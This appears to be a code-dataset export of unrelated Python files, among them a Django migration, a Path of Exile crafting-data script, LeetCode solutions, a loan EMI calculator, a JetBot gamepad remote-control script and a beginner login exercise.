return W-2 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-01 11:51
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('application', '0004_remove_album_publish_date'),
]
operations = [
migrations.RenameField(
model_name='album',
old_name='cover_url',
new_name='cover_image',
),
migrations.RemoveField(
model_name='album',
name='feature',
),
migrations.AddField(
model_name='album',
name='m_order',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='album',
name='release_date',
field=models.DateTimeField(auto_now=True),
),
]
|
from PyPoE.poe.file import dat
from PyPoE.poe.file.ggpk import GGPKFile
from PyPoE.poe.file.translations import TranslationFileCache
from PyPoE.poe.sim import mods
import operator
def load_from_ggpk():
ggpk = GGPKFile()
ggpk.read(r'C:\Games\Grinding Gear Games\Path of Exile\content.ggpk')
ggpk.directory_build()
r = dat.RelationalReader(path_or_ggpk=ggpk, files=['CraftingBenchOptions.dat'], read_options={'use_dat_value': False})
tc = TranslationFileCache(path_or_ggpk=ggpk, files=['stat_descriptions.txt'], merge_with_custom_file=True)
#
ret = []
for i in r['CraftingBenchOptions.dat'].row_iter():
# if item is from prophecy, Default/plinth, niko, jun
if i['HideoutNPCsKey'].rowid in [0, 3, 4, 5]:
temp = {
'name': mods.get_translation(i['ModsKey'], tc, use_placeholder=True).lines if i['ModsKey'] else [i['RecipeIds'][0]['Description']] if i['RecipeIds'] else ['Default'],
'mod': mods.get_translation(i['ModsKey'], tc).lines if i['ModsKey'] else [i['Name']] if i['Name'] else ['Default'],
'master': 9 if i['HideoutNPCsKey'].rowid == 0 else 1 if i['HideoutNPCsKey'].rowid == 4 else i['HideoutNPCsKey'].rowid, # ['Hideout_NPCsKey']['Name'],
'mod_group_name': i['ModFamily'] if i['ModFamily'] else [i['RecipeIds'][0]['Description']] if i['RecipeIds'] else ['Default'],
'order': i['Order'],
'tier': i['Tier'],
'cost': i['Cost_Values'],
'currency': [j['Name'] for j in i['Cost_BaseItemTypesKeys']],
'bases': [j['Id'] for j in i['CraftingItemClassCategoriesKeys']],
'location': i['CraftingBenchUnlockCategoriesKey']['ObtainingDescription'] if i['CraftingBenchUnlockCategoriesKey'] is not None else i['RecipeIds'][0]['UnlockDescription'] if i['RecipeIds'] else 'Default',
'groupid': i['CraftingBenchUnlockCategoriesKey'].rowid if i['CraftingBenchUnlockCategoriesKey'] is not None else i['RecipeIds'][0]['RecipeId'] if i['RecipeIds'] else 'default',
'type': i['AffixType']
}
temp['bases'].sort()
ret.append(temp)
ret = sorted(ret, key=operator.itemgetter('master', 'order', 'tier'))
return ret
# Helper function for Jun veiled names
def parse_jun(loc, type):
# For converting veiled
veillookup = {
'Gravicius Reborn': "Gravicius' Veiled",
'Rin Yuushu': "Rin's Veiled",
'Guff Grenn': "Guff's Veiled",
'Vorici': "Vorici's Veiled",
'Korell Goya': "Korell's Veiled",
'Vagan': "Vagan's Veiled",
'Elreon': "Elreon's Veiled",
'Leo': "Leo's Veiled",
'Tora': "Tora's Veiled",
'Haku': "Haku's Veiled",
'It That Fled': "It That Fled's Veiled",
'Syndicate Mastermind': "Catarina's Veiled",
'Thane Jorgin': "of Jorgin's Veil",
'Hillock, the Blacksmith': "of Hillock's Veil",
'Janus Perandus': "of Janus' Veil",
'Aisling Laffrey': "of Aisling's Veil",
'Cameria the Coldblooded': "of Cameria's Veil",
'Riker Maloney': "of Riker's Veil",
}
for i in veillookup:
if i in loc:
return veillookup[i]
if type == 'Prefix':
return 'Veiled'
return 'of the Veil'
# given a sorted list of dictionaries representing recipes, clean up the data for presentation
def htmlify(data):
# For converting currencies and bases to images
spanlookup = {
"Orb of Alteration": 'alt',
"Orb of Transmutation": 'transmute',
"Orb of Alchemy": 'alch',
"Chaos Orb": 'chaos',
"Orb of Augmentation": 'aug',
"Orb of Chance": 'chance',
"Divine Orb": 'divine',
"Exalted Orb": 'exalt',
"Regal Orb": 'regal',
"Glassblower's Bauble": 'bauble',
"Vaal Orb": 'vaal',
"Armourer's Scrap": 'scrap',
"Blessed Orb": 'blessed',
"Orb of Fusing": 'fuse',
"Jeweller's Orb": 'jorb',
"Chromatic Orb": 'chrom',
"Orb of Scouring": 'scour',
"Gemcutter's Prism": 'gcp',
"Blacksmith's Whetstone": 'whetstone',
"OneHandMelee": 'om',
"OneHandRanged": 'or',
"TwoHandMelee": 'tm',
"TwoHandRanged": 'tr',
"Amulet": 'am',
"BodyArmour": 'bd',
"Belt": 'be',
"Boots": 'bo',
"Gloves": 'gl',
"Helmet": 'he',
"Quiver": 'qu',
"Ring": 'ri',
"Shield": 'sh',
"Flask": 'fl'
}
processed = {}
groups = {}
for mod in data:
if mod['type'] not in processed:
processed[mod['type']] = []
groups[mod['type']] = []
name = (mod['mod_group_name'], mod['master'])
if name in groups[mod['type']]:
idx = groups[mod['type']].index(name)
else:
idx = -1
groups[mod['type']].append(name)
processed[mod['type']].append({
'name': '<br>'.join(mod['name']),
"mods": {}
})
if mod['tier'] in processed[mod['type']][idx]['mods']:
processed[mod['type']][idx]['mods'][mod['tier']]['name'] += '<br><br>' + '<br>'.join(mod['mod']).replace("'", "\\'")
cost_ = ', '.join([f'{mod["cost"][i]}<span class="{spanlookup[mod["currency"][i]]}"></span>' for i in range(len(mod['cost']))]).replace("'", "\\'")
slots_ = ''.join([f'<span class="{spanlookup[i]}"></span>' for i in mod['bases']])
loc_ = mod['location'].replace("'", "\\'") if mod['master'] != 5 else parse_jun(mod['location'], mod['type']).replace("'", "\\'")
groupid_ = f"{mod['master']}-{mod['groupid']}"
if cost_ not in processed[mod['type']][idx]['mods'][mod['tier']]['cost']:
processed[mod['type']][idx]['mods'][mod['tier']]['cost'] += f"<br><br>{cost_}"
if slots_ not in processed[mod['type']][idx]['mods'][mod['tier']]['slots']:
processed[mod['type']][idx]['mods'][mod['tier']]['slots'] += f"<br><br>{slots_}"
processed[mod['type']][idx]['mods'][mod['tier']]['slots_meta'].update(set([f'{spanlookup[i]}' for i in mod['bases']]))
if loc_ not in processed[mod['type']][idx]['mods'][mod['tier']]['loc']:
processed[mod['type']][idx]['mods'][mod['tier']]['loc'] += f"<br><br>{loc_}"
if groupid_ not in processed[mod['type']][idx]['mods'][mod['tier']]['groupid']:
processed[mod['type']][idx]['mods'][mod['tier']]['groupid'] += f" {groupid_}"
else:
processed[mod['type']][idx]['mods'][mod['tier']] = {
'name': '<br>'.join(mod['mod']).replace("'", "\\'"),
'cost': ', '.join([f'{mod["cost"][i]}<span class="{spanlookup[mod["currency"][i]]}"></span>' for i in range(len(mod['cost']))]).replace("'", "\\'"),
'slots': ''.join([f'<span class="{spanlookup[i]}"></span>' for i in mod['bases']]),
'slots_meta': set([f'{spanlookup[i]}' for i in mod['bases']]),
'loc': mod['location'].replace("'", "\\'") if mod['master'] != 5 else parse_jun(mod['location'], mod['type']).replace("'", "\\'"),
'groupid': f"{mod['master']}-{mod['groupid']}" if mod['master'] != 5 else f"{mod['master']}-{mod['groupid']}-{mod['tier']}"
}
# Section -> mod group -> mod -> [name, cost, slot, location, groupid]
buf = 'mods = [\n'
for affix in ['Prefix', 'Suffix', 'Other']:
buf += f'\t["{affix}", [\n'
for mod in processed[affix]:
buf += f'\t\t["{mod["name"]}", [\n'
for m in sorted(mod['mods']):
buf += f"\t\t\t['{mod['mods'][m]['name']}', '{mod['mods'][m]['cost']}', '{mod['mods'][m]['slots']}', \"{' '.join(mod['mods'][m]['slots_meta'])}\", '{mod['mods'][m]['loc']}', '{mod['mods'][m]['groupid']}'],\n"
buf += '\t\t]],\n'
buf += '\t]],\n'
buf += ']'
with open('table_data.py', 'w') as f:
f.write(buf)
def main():
data = load_from_ggpk()
htmlify(data)
if __name__ == '__main__':
main() |
def emi_calculator(p, r, t):
r = r / (12 * 100) # one month interest
t = t * 12 # one month period
emi = (p * r * pow(1 + r, t)) / (pow(1 + r, t) - 1)
return emi
# driver code
principal = 500000;
rate = 1.5;
time = 1;
emi = emi_calculator(principal, rate, time);
print("Monthly EMI is= ", emi)
|
"""
Divide two integers without using multiplication, division and mod operator.
If it is overflow, return MAX_INT.
"""
class Solution(object):
def divide(self, dividend, divisor):
"""
:type dividend: int
:type divisor: int
:rtype: int
"""
positive = (dividend > 0) is (divisor > 0)
divisor,dividend = abs(divisor),abs(dividend)
res = 0
while dividend >= divisor:
r = 1
c = divisor
while dividend >= c:
res += r
dividend -= c
r <<= 1
c <<= 1
if res > 0x7fffffff:
return 0x7fffffff if positive else -0x80000000
return res if positive else -res |
import evdev
from evdev import InputDevice, categorize, ecodes, KeyEvent
from jetbot import Robot
from jetbot import Camera
import jetbot.utils.teensyadc as teensyadc
from cv2 import imencode
import time, os, sys, math, datetime, subprocess
import pwd, grp
import signal, select
CROSS = 305
TRIANGLE = 307
CIRCLE = 306
SQUARE = 304
L1 = 308
R1 = 309
L2 = 310
R2 = 311
L3 = 314
R3 = 315
SHARE = 312
OPTION = 313
TPAD = 317
PSHOME = 316
OTHERCODE = 320
LEFT_X = "ABS_X" # 0 is left
LEFT_Y = "ABS_Y" # 0 is up
RIGHT_X = "ABS_Z" # 0 is left
RIGHT_Y = "ABS_RZ" # 0 is up
L2_ANALOG = "ABS_RX" # 0 is released
R2_ANALOG = "ABS_RY" # 0 is released
DPAD_X = "ABS_HAT0X" # -1 is left
DPAD_Y = "ABS_HAT0Y" # -1 is up
NN_STEERING = "NN_STEERING"
NN_THROTTLE = "NN_THROTTLE"
axis = {
"ABS_RZ": 128,
"ABS_Z": 128,
"ABS_Y": 128,
"ABS_X": 128,
"ABS_RX": 128,
"ABS_RY": 128,
"ABS_HAT0X": 0,
"ABS_HAT0Y": 0,
"NN_STEERING": 0,
"NN_THROTTLE": 0,
}
dualshock = None
cam = None
camproc = None
nnproc = None
robot = None
capidx = 0
continuouscap = False
continuouscaptime = None
neuralnet_latched = False
def get_dualshock4():
devices = [evdev.InputDevice(path) for path in evdev.list_devices()]
for device in devices:
dn = device.name.lower().strip()
if dn == "wireless controller":
return device
def gamepad_event_handler(event, is_remotecontrol=True, is_cameracapture=False):
global axis
global cam
global robot
global continuouscap
global continuouscaptime
global neuralnet_latched
if event.type == ecodes.EV_ABS:
absevent = categorize(event)
axiscode = ecodes.bytype[absevent.event.type][absevent.event.code]
if "ABS_" in axiscode:
axis[axiscode] = absevent.event.value
if is_cameracapture and cam == None:
snapname = get_snap_name(OTHERCODE)
print("saving single pic: " + snapname)
cam_capture(snapname)
if event.type == ecodes.EV_KEY:
btnevent = categorize(event)
if event.value == KeyEvent.key_down:
if event.code == TPAD:
if is_remotecontrol:
neuralnet_latched = False
try:
robot.motors_makeSafe()
except Exception:
pass
end_cam_proc()
end_nn_proc()
elif is_cameracapture:
pass
elif event.code == PSHOME:
if is_remotecontrol:
try:
robot.motors_makeUnsafe()
except Exception:
pass
elif event.code == R1:
if is_remotecontrol:
start_cam_proc()
elif is_cameracapture:
snapname = get_snap_name(event.code)
print("saving single pic: " + snapname)
cam_capture(snapname)
elif event.code == L1:
if is_remotecontrol:
start_cam_proc()
elif is_cameracapture:
continuouscap = not continuouscap
continuouscaptime = datetime.datetime.now()
elif event.code == TRIANGLE:
neuralnet_latched = False
elif event.value == KeyEvent.key_up:
pass
def run(remotecontrol=True, cameracapture=False):
global dualshock
global robot
global axis
global continuouscap
global continuouscaptime
global neuralnet_latched
global nnproc
prevShutter = False
meaningful_input_time = None
neuralnet_input_time = None
cam_cap_time = None
last_speed_debug_time = datetime.datetime.now()
last_tick_debug_time = datetime.datetime.now()
print("Remote Control script running! ", end=" ")
if remotecontrol:
print("in RC mode")
elif cameracapture:
print("in CAMERA mode")
else:
print("unknown mode, quitting")
quit()
if remotecontrol:
try:
robot = Robot()
except Exception as ex:
sys.stderr.write("Failed to initialize motor drivers, error: %s" % (str(ex)))
robot = None
while True:
dualshock = get_dualshock4()
if dualshock != None:
print("DualShock4 found, %s" % str(dualshock))
else:
time.sleep(2)
now = datetime.datetime.now()
delta_time = now - last_tick_debug_time
if delta_time.total_seconds() > 5:
last_tick_debug_time = now
sys.stderr.write("tick %s" % (str(now)))
while dualshock != None:
now = datetime.datetime.now()
delta_time = now - last_tick_debug_time
if delta_time.total_seconds() > 5:
last_tick_debug_time = now
sys.stderr.write("tick %s" % (str(now)))
try:
event = dualshock.read_one()
if event != None:
gamepad_event_handler(event, is_remotecontrol=remotecontrol, is_cameracapture=cameracapture)
else:
time.sleep(0)
all_btns = dualshock.active_keys()
if remotecontrol:
meaningful_input = False # meaningful input means any buttons pressed or the stick has been moved
if TRIANGLE in all_btns:
neuralnet_latched = False
mag_dpad, ang_dpad = axis_vector(axis[DPAD_X], axis[DPAD_Y])
mag_left, ang_left = axis_vector(axis_normalize(axis[LEFT_X], curve=0), axis_normalize(axis[LEFT_Y], curve=0))
mag_right, ang_right = axis_vector(axis_normalize(axis[RIGHT_X], curve=0), axis_normalize(axis[RIGHT_Y], curve=0))
now = datetime.datetime.now()
if mag_dpad != 0 or mag_left > 0.1 or mag_right > 0.1:
meaningful_input = True
if meaningful_input_time == None:
print("meaningful input!")
meaningful_input_time = now
elif meaningful_input_time != None: # user may have let go, check for timeout
delta_time = now - meaningful_input_time
if delta_time.total_seconds() > 2:
print("No meaningful input, stopping robot motors")
meaningful_input = False
meaningful_input_time = None
if robot != None:
robot.stop()
else:
meaningful_input = True
use_nn = False
if SQUARE in all_btns:
neuralnet_latched = True
if TRIANGLE in all_btns:
neuralnet_latched = False
if neuralnet_latched or CROSS in all_btns:
use_nn = True
if meaningful_input == False and nnproc is not None: # remote control inputs always override neural net inputs
while sys.stdin in select.select([sys.stdin], [], [], 0)[0]:
line = sys.stdin.readline()
if line:
try:
axis[NN_THROTTLE] = int(line[0:3])
axis[NN_STEERING] = int(line[3:])
neuralnet_input_time = now
except:
pass
if neuralnet_input_time != None and use_nn:
delta_time = now - neuralnet_input_time
if delta_time.total_seconds() < 5:
meaningful_input = True
meaningful_input_time = now
if meaningful_input:
left_speed = 0
right_speed = 0
ignore_dpad = False
#ignore_rightstick = True
if use_nn:
start_nn_proc() # this will check if process has already started
left_speed, right_speed = axis_mix(axis_normalize(axis[NN_STEERING]), axis_normalize(255 - axis[NN_THROTTLE]))
elif mag_dpad != 0 and ignore_dpad == False:
left_speed, right_speed = axis_mix(float(axis[DPAD_X]) / 3.0, axis[DPAD_Y])
#elif mag_left > mag_right or ignore_rightstick == True:
# left_speed, right_speed = axis_mix(axis_normalize(axis[LEFT_X]), axis_normalize(axis[LEFT_Y]))
# if ignore_rightstick == False:
# left_speed /= 2
# right_speed /= 2
else:
# left_speed, right_speed = axis_mix(axis_normalize(axis[RIGHT_X]), axis_normalize(axis[RIGHT_Y]))
left_speed, right_speed = axis_mix(axis_normalize(axis[RIGHT_X]), axis_normalize(axis[LEFT_Y]))
if robot != None:
robot.set_motors(left_speed, right_speed)
delta_time = now - last_speed_debug_time
if delta_time.total_seconds() >= 1:
if use_nn:
print("nn -> ", end="")
print("leftmotor: %.2f rightmotor: %.2f" % (left_speed, right_speed))
last_speed_debug_time = now
elif cameracapture:
now = datetime.datetime.now()
need_cap = False
if L1 in all_btns:
if prevShutter == False:
if continuouscaptime != None:
timedelta = now - continuouscaptime
if timedelta.total_seconds() > 0.5:
continuouscap = not continuouscap
else:
continuouscap = not continuouscap
prevShutter = True
else:
prevShutter = False
if continuouscap:
cam_cap_time = now
need_cap = L1
else:
if cam_cap_time != None:
timedelta = now - cam_cap_time
if timedelta.total_seconds() < 1:
#need_cap = OTHERCODE
pass
else:
cam_cap_time = None
if need_cap != False:
snapname = get_snap_name(need_cap)
print("saving running pic: " + snapname)
cam_capture(snapname)
cam_frame_time = now
while True:
now = datetime.datetime.now()
cam_frame_timedelta = now - cam_frame_time
if cam_frame_timedelta.total_seconds() >= 0.01:
break
event = dualshock.read_one()
if event != None:
gamepad_event_handler(event, is_remotecontrol=False, is_cameracapture=True)
except OSError:
print("DualShock4 disconnected")
dualshock = None
if remotecontrol:
end_cam_proc()
if robot != None:
robot.stop()
def axis_normalize(v, curve=1.8, deadzone_inner=16, deadzone_outer=16):
limit = 255
center = limit / 2.0
m = 1
if v < center:
m = -1
v = 255 - v
v -= center + deadzone_inner
r = limit - deadzone_outer
r -= center + deadzone_inner
v = v / r
if curve != 0:
v = (math.exp(v * curve) - math.exp(0)) / (math.exp(curve) - math.exp(0))
if v < 0.0:
return 0 * m
elif v > 1.0:
return 1.0 * m
else:
return v * m
def axis_mix(x, y):
y = -y # stick Y axis is inverted
left = y
right = y
left += x
right -= x
left = min(1.0, max(-1.0, left))
right = min(1.0, max(-1.0, right))
return left, right
def axis_vector(x, y, maglim = 2.0):
y = -y # stick Y axis is inverted
mag = math.sqrt((x*x) + (y*y))
theta = math.atan2(x, y)
ang = math.degrees(theta)
if mag > maglim:
mag = maglim
return mag, ang
def flip_axis(x):
return 255 - x
def cam_capture(fn):
global cam
global capidx
capidx += 1
path = "/home/jetbot/camerasnaps"
try:
os.makedirs(path)
except FileExistsError:
pass
except Exception as ex:
print("Exception creating directory '%s', error: %s" % (path, str(ex)))
return
if cam == None:
try:
print("Initializing camera...")
cam = Camera.instance(width=960, height=720)
print("\r\nCamera initialized!")
except Exception as ex:
sys.stderr.write("Exception initializing camera: " + str(ex))
cam = None
return
try:
fp = os.path.join(path, fn + '.jpg')
with open(fp, 'wb') as f:
f.write(bytes(imencode('.jpg', cam.value)[1]))
teensyadc.set_camera_led()
try:
uid = pwd.getpwnam("jetbot").pw_uid
gid = grp.getgrnam("jetbot").gr_gid
os.chown(fp, uid, gid)
except Exception as ex:
sys.stderr.write("Exception changing ownership of file '%s', error: %s" % (fp, str(ex)))
except Exception as ex:
sys.stderr.write("Exception writing to file '%s', error: %s" % (fp, str(ex)))
def get_snap_name(initiating_key=None):
global dualshock
global capidx
global axis
now = datetime.datetime.now()
keybitmap = 0
try:
all_btns = dualshock.active_keys()
for b in all_btns:
bb = b - 304
keybitmap |= 1 << bb
except:
pass
if initiating_key != None:
bb = initiating_key - 304
keybitmap |= 1 << bb
name = "%04u%02u%02u%02u%02u%02u_%08u" % (now.year, now.month, now.day, now.hour, now.minute, now.second, capidx)
try:
name += "_%03u%03u" % (int(round(axis_normalize(flip_axis(axis[LEFT_Y])) * 127.0)) + 127, int(round(axis_normalize(axis[RIGHT_X]) * 127.0)) + 127)
name += "_%08X" % keybitmap
mag, ang = axis_vector(axis[DPAD_X], axis[DPAD_Y])
if ang < 0:
ang = 360 + ang
name += "_%03u%03u" % (round(mag * 100.0), round(ang))
mag, ang = axis_vector(axis_normalize(axis[LEFT_X]), axis_normalize(axis[LEFT_Y]), maglim=1.0)
if ang < 0:
ang = 360 + ang
name += "_%03u%03u" % (round(mag * 100.0), round(ang))
mag, ang = axis_vector(axis_normalize(axis[RIGHT_X]), axis_normalize(axis[RIGHT_Y]), maglim=1.0)
if ang < 0:
ang = 360 + ang
name += "_%03u%03u" % (round(mag * 100.0), round(ang))
except Exception as ex:
sys.stderr.write ("Exception while generating snap name: " + str(ex))
return name
def start_cam_proc():
global camproc
if camproc != None:
return
print("starting camera process...", end=" ")
camproc = subprocess.Popen(['python3', '/home/jetbot/jetbot/jetbot/apps/remotecamera.py', str(os.getpid())])
print(" done!")
def end_cam_proc():
global camproc
if camproc == None:
return
try:
camproc.kill()
camproc = None
except Exception as ex:
sys.stderr.write("Exception while trying to kill camera process: " + str(ex))
finally:
print("ended camera process")
def set_camera_instance(c):
global cam
cam = c
def get_camera_instance():
global cam
return cam
def start_nn_proc():
global nnproc
if nnproc != None:
return
print("starting neuralnetwork process...", end=" ")
nnproc = subprocess.Popen(['python3', '/home/jetbot/jetbot/jetbot/apps/neuralnetwork.py', str(os.getpid())])
print(" done!")
def end_nn_proc():
global nnproc
if nnproc == None:
return
try:
nnproc.kill()
nnproc = None
except Exception as ex:
sys.stderr.write("Exception while trying to kill neuralnetwork process: " + str(ex))
finally:
print("ended neuralnetwork process")
if __name__ == '__main__':
run()
|
class Solution(object):
def sortedSquares(self, nums):
"""
:type A: List[int]
:rtype: List[int]
"""
squares = [0 for i in range(len(nums))]
# index iterator for squares array
i = len(squares) - 1
left = 0
right = len(nums) - 1
while left <= right:
# if calculate the absolute values of
if abs(nums[left]) < abs(nums[right]):
squares[i] = (nums[right])**2
right -= 1
else:
squares[i] = (nums[left])**2
left += 1
i -= 1
return squares
numbers = [-7, -3, 2, 3, 11]
obj = Solution()
result = obj.sortedSquares(numbers)
print(result)
|
print('Enter correct username and password combo to continue')
username=input("enter username")
password=input("enter the password")
count = 0
count += 1
while username == username and password == password:
if count == 3:
print("\nThree Username and Password Attempts used. Goodbye")
break
elif username == 'focusit' and password == 'adisir':
print("Welcome! ")
break
elif username != 'focusit' and password != 'adisir':
print("Your Username and Password is wrong!")
username = input("\n\nUsername: ")
password = input("Password: ")
count += 1
continue
elif username == 'focusit' and password != 'adisir':
print("Your Password is wrong!")
username = input("\n\nUsername: ")
password = input("Password: ")
count += 1
continue
elif username != 'focusit' and password == 'adisir':
print("Your Username is wrong!")
username = input("\n\nUsername: ")
password = input("Password: ")
count += 1
continue
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.